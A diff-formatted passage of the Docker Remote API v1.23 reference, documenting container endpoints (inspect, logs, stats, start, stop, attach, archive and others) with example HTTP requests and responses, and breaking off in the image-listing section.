+        container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`.
+    -   **VolumesFrom** - A list of volumes to inherit from another container.
+          Specified in the form `<container name>[:<ro|rw>]`
+    -   **CapAdd** - A list of kernel capabilities to add to the container.
+    -   **Capdrop** - A list of kernel capabilities to drop from the container.
+    -   **GroupAdd** - A list of additional groups that the container process will run as
+    -   **RestartPolicy** – The behavior to apply when the container exits.  The
+            value is an object with a `Name` property of either `"always"` to
+            always restart, `"unless-stopped"` to restart always except when
+            user has manually stopped the container or `"on-failure"` to restart only when the container
+            exit code is non-zero.  If `on-failure` is used, `MaximumRetryCount`
+            controls the number of times to retry before giving up.
+            The default is not to restart. (optional)
+            An ever increasing delay (double the previous delay, starting at 100mS)
+            is added before each restart to prevent flooding the server.
+    -   **UsernsMode**  - Sets the usernamespace mode for the container when usernamespace remapping option is enabled.
+           supported values are: `host`.
+    -   **NetworkMode** - Sets the networking mode for the container. Supported
+          standard values are: `bridge`, `host`, `none`, and `container:<name|id>`. Any other value is taken
+          as a custom network's name to which this container should connect to.
+    -   **Devices** - A list of devices to add to the container specified as a JSON object in the
+      form
+          `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}`
+    -   **Ulimits** - A list of ulimits to set in the container, specified as
+          `{ "Name": <name>, "Soft": <soft limit>, "Hard": <hard limit> }`, for example:
+          `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }`
+    -   **SecurityOpt**: A list of string values to customize labels for MLS
+        systems, such as SELinux.
+    -   **LogConfig** - Log configuration for the container, specified as a JSON object in the form
+          `{ "Type": "<driver_name>", "Config": {"key1": "val1"}}`.
+          Available types: `json-file`, `syslog`, `journald`, `gelf`, `fluentd`, `awslogs`, `splunk`, `etwlogs`, `none`.
+          `json-file` logging driver.
+    -   **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist.
+    -   **VolumeDriver** - Driver that this container users to mount volumes.
+    -   **ShmSize** - Size of `/dev/shm` in bytes. The size must be greater than 0.  If omitted the system uses 64MB.
+
+**Query parameters**:
+
+-   **name** – Assign the specified name to the container. Must
+    match `/?[a-zA-Z0-9_-]+`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **406** – impossible to attach (container not running)
+-   **409** – conflict
+-   **500** – server error
+
+#### Inspect a container
+
+`GET /containers/(id or name)/json`
+
+Return low-level information on the container `id`
+
+**Example request**:
+
+      GET /v1.23/containers/4fa6e0f0c678/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+	{
+		"AppArmorProfile": "",
+		"Args": [
+			"-c",
+			"exit 9"
+		],
+		"Config": {
+			"AttachStderr": true,
+			"AttachStdin": false,
+			"AttachStdout": true,
+			"Cmd": [
+				"/bin/sh",
+				"-c",
+				"exit 9"
+			],
+			"Domainname": "",
+			"Entrypoint": null,
+			"Env": [
+				"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+			],
+			"ExposedPorts": null,
+			"Hostname": "ba033ac44011",
+			"Image": "ubuntu",
+			"Labels": {
+				"com.example.vendor": "Acme",
+				"com.example.license": "GPL",
+				"com.example.version": "1.0"
+			},
+			"MacAddress": "",
+			"NetworkDisabled": false,
+			"OnBuild": null,
+			"OpenStdin": false,
+			"StdinOnce": false,
+			"Tty": false,
+			"User": "",
+			"Volumes": {
+				"/volumes/data": {}
+			},
+			"WorkingDir": "",
+			"StopSignal": "SIGTERM"
+		},
+		"Created": "2015-01-06T15:47:31.485331387Z",
+		"Driver": "devicemapper",
+		"ExecIDs": null,
+		"HostConfig": {
+			"Binds": null,
+			"BlkioWeight": 0,
+			"BlkioWeightDevice": [{}],
+			"BlkioDeviceReadBps": [{}],
+			"BlkioDeviceWriteBps": [{}],
+			"BlkioDeviceReadIOps": [{}],
+			"BlkioDeviceWriteIOps": [{}],
+			"CapAdd": null,
+			"CapDrop": null,
+			"ContainerIDFile": "",
+			"CpusetCpus": "",
+			"CpusetMems": "",
+			"CpuShares": 0,
+			"CpuPeriod": 100000,
+			"Devices": [],
+			"Dns": null,
+			"DnsOptions": null,
+			"DnsSearch": null,
+			"ExtraHosts": null,
+			"IpcMode": "",
+			"Links": null,
+			"LxcConf": [],
+			"Memory": 0,
+			"MemorySwap": 0,
+			"MemoryReservation": 0,
+			"KernelMemory": 0,
+			"OomKillDisable": false,
+			"OomScoreAdj": 500,
+			"NetworkMode": "bridge",
+			"PidMode": "",
+			"PortBindings": {},
+			"Privileged": false,
+			"ReadonlyRootfs": false,
+			"PublishAllPorts": false,
+			"RestartPolicy": {
+				"MaximumRetryCount": 2,
+				"Name": "on-failure"
+			},
+			"LogConfig": {
+				"Config": null,
+				"Type": "json-file"
+			},
+			"SecurityOpt": null,
+			"VolumesFrom": null,
+			"Ulimits": [{}],
+			"VolumeDriver": "",
+			"ShmSize": 67108864
+		},
+		"HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname",
+		"HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts",
+		"LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log",
+		"Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39",
+		"Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2",
+		"MountLabel": "",
+		"Name": "/boring_euclid",
+		"NetworkSettings": {
+			"Bridge": "",
+			"SandboxID": "",
+			"HairpinMode": false,
+			"LinkLocalIPv6Address": "",
+			"LinkLocalIPv6PrefixLen": 0,
+			"Ports": null,
+			"SandboxKey": "",
+			"SecondaryIPAddresses": null,
+			"SecondaryIPv6Addresses": null,
+			"EndpointID": "",
+			"Gateway": "",
+			"GlobalIPv6Address": "",
+			"GlobalIPv6PrefixLen": 0,
+			"IPAddress": "",
+			"IPPrefixLen": 0,
+			"IPv6Gateway": "",
+			"MacAddress": "",
+			"Networks": {
+				"bridge": {
+					"NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+					"EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d",
+					"Gateway": "172.17.0.1",
+					"IPAddress": "172.17.0.2",
+					"IPPrefixLen": 16,
+					"IPv6Gateway": "",
+					"GlobalIPv6Address": "",
+					"GlobalIPv6PrefixLen": 0,
+					"MacAddress": "02:42:ac:12:00:02"
+				}
+			}
+		},
+		"Path": "/bin/sh",
+		"ProcessLabel": "",
+		"ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf",
+		"RestartCount": 1,
+		"State": {
+			"Error": "",
+			"ExitCode": 9,
+			"FinishedAt": "2015-01-06T15:47:32.080254511Z",
+			"OOMKilled": false,
+			"Dead": false,
+			"Paused": false,
+			"Pid": 0,
+			"Restarting": false,
+			"Running": true,
+			"StartedAt": "2015-01-06T15:47:32.072697474Z",
+			"Status": "running"
+		},
+		"Mounts": [
+			{
+				"Name": "fac362...80535",
+				"Source": "/data",
+				"Destination": "/data",
+				"Driver": "local",
+				"Mode": "ro,Z",
+				"RW": false,
+				"Propagation": ""
+			}
+		]
+	}
+
+**Example request, with size information**:
+
+    GET /v1.23/containers/4fa6e0f0c678/json?size=1 HTTP/1.1
+
+**Example response, with size information**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+    ....
+    "SizeRw": 0,
+    "SizeRootFs": 972,
+    ....
+    }
+
+**Query parameters**:
+
+-   **size** – 1/True/true or 0/False/false, return container size information. Default is `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### List processes running inside a container
+
+`GET /containers/(id or name)/top`
+
+List processes running inside the container `id`. On Unix systems this
+is done by running the `ps` command. This endpoint is not
+supported on Windows.
+
+**Example request**:
+
+    GET /v1.23/containers/4fa6e0f0c678/top HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Titles" : [
+         "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD"
+       ],
+       "Processes" : [
+         [
+           "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash"
+         ],
+         [
+           "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10"
+         ]
+       ]
+    }
+
+**Example request**:
+
+    GET /v1.23/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Titles" : [
+        "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND"
+      ]
+      "Processes" : [
+        [
+          "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash"
+        ],
+        [
+          "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10"
+        ]
+      ],
+    }
+
+**Query parameters**:
+
+-   **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef`
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container logs
+
+`GET /containers/(id or name)/logs`
+
+Get `stdout` and `stderr` logs from the container ``id``
+
+> **Note**:
+> This endpoint works only for containers with the `json-file` or `journald` logging drivers.
+
+**Example request**:
+
+     GET /v1.23/containers/4fa6e0f0c678/logs?stderr=1&stdout=1&timestamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1
+
+**Example response**:
+
+     HTTP/1.1 101 UPGRADED
+     Content-Type: application/vnd.docker.raw-stream
+     Connection: Upgrade
+     Upgrade: tcp
+
+     {% raw %}
+     {{ STREAM }}
+     {% endraw %}
+
+**Query parameters**:
+
+-   **follow** – 1/True/true or 0/False/false, return stream. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`.
+-   **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp
+    will only output log-entries since that timestamp. Default: 0 (unfiltered)
+-   **timestamps** – 1/True/true or 0/False/false, print timestamps for
+        every log line. Default `false`.
+-   **tail** – Output specified number of lines at the end of logs: `all` or `<number>`. Default all.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **404** – no such container
+-   **500** – server error
+
+#### Inspect changes on a container's filesystem
+
+`GET /containers/(id or name)/changes`
+
+Inspect changes on container `id`'s filesystem
+
+**Example request**:
+
+    GET /v1.23/containers/4fa6e0f0c678/changes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Path": "/dev",
+                 "Kind": 0
+         },
+         {
+                 "Path": "/dev/kmsg",
+                 "Kind": 1
+         },
+         {
+                 "Path": "/test",
+                 "Kind": 1
+         }
+    ]
+
+Values for `Kind`:
+
+- `0`: Modify
+- `1`: Add
+- `2`: Delete
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Export a container
+
+`GET /containers/(id or name)/export`
+
+Export the contents of container `id`
+
+**Example request**:
+
+    GET /v1.23/containers/4fa6e0f0c678/export HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/octet-stream
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container stats based on resource usage
+
+`GET /containers/(id or name)/stats`
+
+This endpoint returns a live stream of a container's resource usage statistics.
+
+**Example request**:
+
+    GET /v1.23/containers/redis1/stats HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Type: application/json
+
+      {
+         "read" : "2015-01-08T22:57:31.547920715Z",
+         "pids_stats": {
+            "current": 3
+         },
+         "networks": {
+                 "eth0": {
+                     "rx_bytes": 5338,
+                     "rx_dropped": 0,
+                     "rx_errors": 0,
+                     "rx_packets": 36,
+                     "tx_bytes": 648,
+                     "tx_dropped": 0,
+                     "tx_errors": 0,
+                     "tx_packets": 8
+                 },
+                 "eth5": {
+                     "rx_bytes": 4641,
+                     "rx_dropped": 0,
+                     "rx_errors": 0,
+                     "rx_packets": 26,
+                     "tx_bytes": 690,
+                     "tx_dropped": 0,
+                     "tx_errors": 0,
+                     "tx_packets": 9
+                 }
+         },
+         "memory_stats" : {
+            "stats" : {
+               "total_pgmajfault" : 0,
+               "cache" : 0,
+               "mapped_file" : 0,
+               "total_inactive_file" : 0,
+               "pgpgout" : 414,
+               "rss" : 6537216,
+               "total_mapped_file" : 0,
+               "writeback" : 0,
+               "unevictable" : 0,
+               "pgpgin" : 477,
+               "total_unevictable" : 0,
+               "pgmajfault" : 0,
+               "total_rss" : 6537216,
+               "total_rss_huge" : 6291456,
+               "total_writeback" : 0,
+               "total_inactive_anon" : 0,
+               "rss_huge" : 6291456,
+               "hierarchical_memory_limit" : 67108864,
+               "total_pgfault" : 964,
+               "total_active_file" : 0,
+               "active_anon" : 6537216,
+               "total_active_anon" : 6537216,
+               "total_pgpgout" : 414,
+               "total_cache" : 0,
+               "inactive_anon" : 0,
+               "active_file" : 0,
+               "pgfault" : 964,
+               "inactive_file" : 0,
+               "total_pgpgin" : 477
+            },
+            "max_usage" : 6651904,
+            "usage" : 6537216,
+            "failcnt" : 0,
+            "limit" : 67108864
+         },
+         "blkio_stats" : {},
+         "cpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24472255,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100215355,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 739306590000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         },
+         "precpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24350896,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100093996,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 9492140000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         }
+      }
+
+The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+
+**Query parameters**:
+
+-   **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Resize a container TTY
+
+`POST /containers/(id or name)/resize`
+
+Resize the TTY for container with  `id`. The unit is number of characters. You must restart the container for the resize to take effect.
+
+**Example request**:
+
+      POST /v1.23/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Length: 0
+      Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – No such container
+-   **500** – Cannot resize container
+
+#### Start a container
+
+`POST /containers/(id or name)/start`
+
+Start the container `id`
+
+> **Note**:
+> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body.
+> See [create a container](#create-a-container) for details.
+
+**Example request**:
+
+    POST /v1.23/containers/e90e34656806/start HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **detachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already started
+-   **404** – no such container
+-   **500** – server error
+
+#### Stop a container
+
+`POST /containers/(id or name)/stop`
+
+Stop the container `id`
+
+**Example request**:
+
+    POST /v1.23/containers/e90e34656806/stop?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already stopped
+-   **404** – no such container
+-   **500** – server error
+
+#### Restart a container
+
+`POST /containers/(id or name)/restart`
+
+Restart the container `id`
+
+**Example request**:
+
+    POST /v1.23/containers/e90e34656806/restart?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Kill a container
+
+`POST /containers/(id or name)/kill`
+
+Kill the container `id`
+
+**Example request**:
+
+    POST /v1.23/containers/e90e34656806/kill HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **signal** - Signal to send to the container: integer or string like `SIGINT`.
+        When not set, `SIGKILL` is assumed and the call waits for the container to exit.
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Update a container
+
+`POST /containers/(id or name)/update`
+
+Update configuration of one or more containers.
+
+**Example request**:
+
+       POST /v1.23/containers/e90e34656806/update HTTP/1.1
+       Content-Type: application/json
+
+       {
+         "BlkioWeight": 300,
+         "CpuShares": 512,
+         "CpuPeriod": 100000,
+         "CpuQuota": 50000,
+         "CpusetCpus": "0,1",
+         "CpusetMems": "0",
+         "Memory": 314572800,
+         "MemorySwap": 514288000,
+         "MemoryReservation": 209715200,
+         "KernelMemory": 52428800,
+         "RestartPolicy": {
+           "MaximumRetryCount": 4,
+           "Name": "on-failure"
+         },
+       }
+
+**Example response**:
+
+       HTTP/1.1 200 OK
+       Content-Type: application/json
+
+       {
+           "Warnings": []
+       }
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+#### Rename a container
+
+`POST /containers/(id or name)/rename`
+
+Rename the container `id` to a `new_name`
+
+**Example request**:
+
+    POST /v1.23/containers/e90e34656806/rename?name=new_name HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **name** – new name for the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **409** - conflict name already assigned
+-   **500** – server error
+
+#### Pause a container
+
+`POST /containers/(id or name)/pause`
+
+Pause the container `id`
+
+**Example request**:
+
+    POST /v1.23/containers/e90e34656806/pause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Unpause a container
+
+`POST /containers/(id or name)/unpause`
+
+Unpause the container `id`
+
+**Example request**:
+
+    POST /v1.23/containers/e90e34656806/unpause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Attach to a container
+
+`POST /containers/(id or name)/attach`
+
+Attach to the container `id`
+
+**Example request**:
+
+    POST /v1.23/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 101 UPGRADED
+    Content-Type: application/vnd.docker.raw-stream
+    Connection: Upgrade
+    Upgrade: tcp
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **detachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **400** – bad parameter
+-   **404** – no such container
+-   **409** - container is paused
+-   **500** – server error
+
+**Stream details**:
+
+When using the TTY setting is enabled in
+[`POST /containers/create`
+](#create-a-container),
+the stream is the raw data from the process PTY and client's `stdin`.
+When the TTY is disabled, then the stream is multiplexed to separate
+`stdout` and `stderr`.
+
+The format is a **Header** and a **Payload** (frame).
+
+**HEADER**
+
+The header contains the information which the stream writes (`stdout` or
+`stderr`). It also contains the size of the associated frame encoded in the
+last four bytes (`uint32`).
+
+It is encoded on the first eight bytes like this:
+
+    header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}
+
+`STREAM_TYPE` can be:
+
+-   0: `stdin` (is written on `stdout`)
+-   1: `stdout`
+-   2: `stderr`
+
+`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of
+the `uint32` size encoded as big endian.
+
+**PAYLOAD**
+
+The payload is the raw stream.
+
+**IMPLEMENTATION**
+
+The simplest way to implement the Attach protocol is the following:
+
+    1.  Read eight bytes.
+    2.  Choose `stdout` or `stderr` depending on the first byte.
+    3.  Extract the frame size from the last four bytes.
+    4.  Read the extracted size and output it on the correct output.
+    5.  Goto 1.
+
+#### Attach to a container (websocket)
+
+`GET /containers/(id or name)/attach/ws`
+
+Attach to the container `id` via websocket
+
+Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455)
+
+**Example request**
+
+    GET /v1.23/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
+
+**Example response**
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **detachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+#### Wait a container
+
+`POST /containers/(id or name)/wait`
+
+Block until container `id` stops, then returns the exit code
+
+**Example request**:
+
+    POST /v1.23/containers/16253994b7c4/wait HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"StatusCode": 0}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Remove a container
+
+`DELETE /containers/(id or name)`
+
+Remove the container `id` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.23/containers/16253994b7c4?v=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **v** – 1/True/true or 0/False/false, Remove the volumes
+        associated to the container. Default `false`.
+-   **force** - 1/True/true or 0/False/false, Kill then remove the container.
+        Default `false`.
+
+**Status codes**:
+
+-   **204** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **409** – conflict
+-   **500** – server error
+
+#### Copy files or folders from a container
+
+`POST /containers/(id or name)/copy`
+
+Copy files or folders of container `id`
+
+**Deprecated** in favor of the `archive` endpoint below.
+
+**Example request**:
+
+    POST /v1.23/containers/4fa6e0f0c678/copy HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Resource": "test.txt"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Retrieving information about files and folders in a container
+
+`HEAD /containers/(id or name)/archive`
+
+See the description of the `X-Docker-Container-Path-Stat` header in the
+following section.
+
+#### Get an archive of a filesystem resource in a container
+
+`GET /containers/(id or name)/archive`
+
+Get a tar archive of a resource in the filesystem of container `id`.
+
+**Query parameters**:
+
+- **path** - resource in the container's filesystem to archive. Required.
+
+    If not an absolute path, it is relative to the container's root directory.
+    The resource specified by **path** must exist. To assert that the resource
+    is expected to be a directory, **path** should end in `/` or  `/.`
+    (assuming a path separator of `/`). If **path** ends in `/.` then this
+    indicates that only the contents of the **path** directory should be
+    copied. A symlink is always resolved to its target.
+
+    > **Note**: It is not possible to copy certain system files such as resources
+    > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the
+    > container.
+
+**Example request**:
+
+    GET /v1.23/containers/8cce319429b2/archive?path=/root HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+    X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0=
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+On success, a response header `X-Docker-Container-Path-Stat` will be set to a
+base64-encoded JSON object containing some filesystem header information about
+the archived resource. The above example value would decode to the following
+JSON object (whitespace added for readability):
+
+```json
+{
+    "name": "root",
+    "size": 4096,
+    "mode": 2147484096,
+    "mtime": "2014-02-27T20:51:23Z",
+    "linkTarget": ""
+}
+```
+
+A `HEAD` request can also be made to this endpoint if only this information is
+desired.
+
+**Status codes**:
+
+- **200** - success, returns archive of copied resource
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** was asserted to be a directory but exists as a
+      file)
+- **404** - client error, resource not found, one of:
+    – no such container (container `id` does not exist)
+    - no such file or directory (**path** does not exist)
+- **500** - server error
+
+#### Extract an archive of files or folders to a directory in a container
+
+`PUT /containers/(id or name)/archive`
+
+Upload a tar archive to be extracted to a path in the filesystem of container
+`id`.
+
+**Query parameters**:
+
+- **path** - path to a directory in the container
+    to extract the archive's contents into. Required.
+
+    If not an absolute path, it is relative to the container's root directory.
+    The **path** resource must exist.
+- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error
+    if unpacking the given content would cause an existing directory to be
+    replaced with a non-directory and vice versa.
+
+**Example request**:
+
+    PUT /v1.23/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** – the content was extracted successfully
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
+    - not a directory (**path** should be a directory but exists as a file)
+    - unable to overwrite existing directory with non-directory
+      (if **noOverwriteDirNonDir**)
+    - unable to overwrite existing non-directory with directory
+      (if **noOverwriteDirNonDir**)
+- **403** - client error, permission denied, the volume
+    or container rootfs is marked as read-only.
+- **404** - client error, resource not found, one of:
+    – no such container (container `id` does not exist)
+    - no such file or directory (**path** resource does not exist)
+- **500** – server error
+
+### 2.2 Images
+
+#### List Images
+
+`GET /images/json`
+
+**Example request**:
+
+    GET /v1.23/images/json?all=0 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+         "RepoTags": [
+           "ubuntu:12.04",
+           "ubuntu:precise",
+           "ubuntu:latest"
+         ],
+         "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c",
+         "Created": 1365714795,
+         "Size": 131506275,
+         "VirtualSize": 131506275,
+         "Labels": {}
+      },
+      {
+         "RepoTags": [
+           "ubuntu:12.10",
+           "ubuntu:quantal"
+         ],
+         "ParentId": "27cf784147099545",
+         "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc",
+         "Created": 1364102658,
+         "Size": 24653,
+         "VirtualSize": 180116135,
+         "Labels": {
+            "com.example.version": "v1"
+         }
+      }
+    ]
+
+**Example request, with digest information**:
+
+    GET /v1.23/images/json?digests=1 HTTP/1.1
+
+**Example response, with digest information**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+        "Created": 1420064636,
+        "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125",
+        "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2",
+        "RepoDigests": [
+          "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+        ],
+        "RepoTags": [
+          "localhost:5000/test/busybox:latest",
+          "playdate:latest"
+        ],
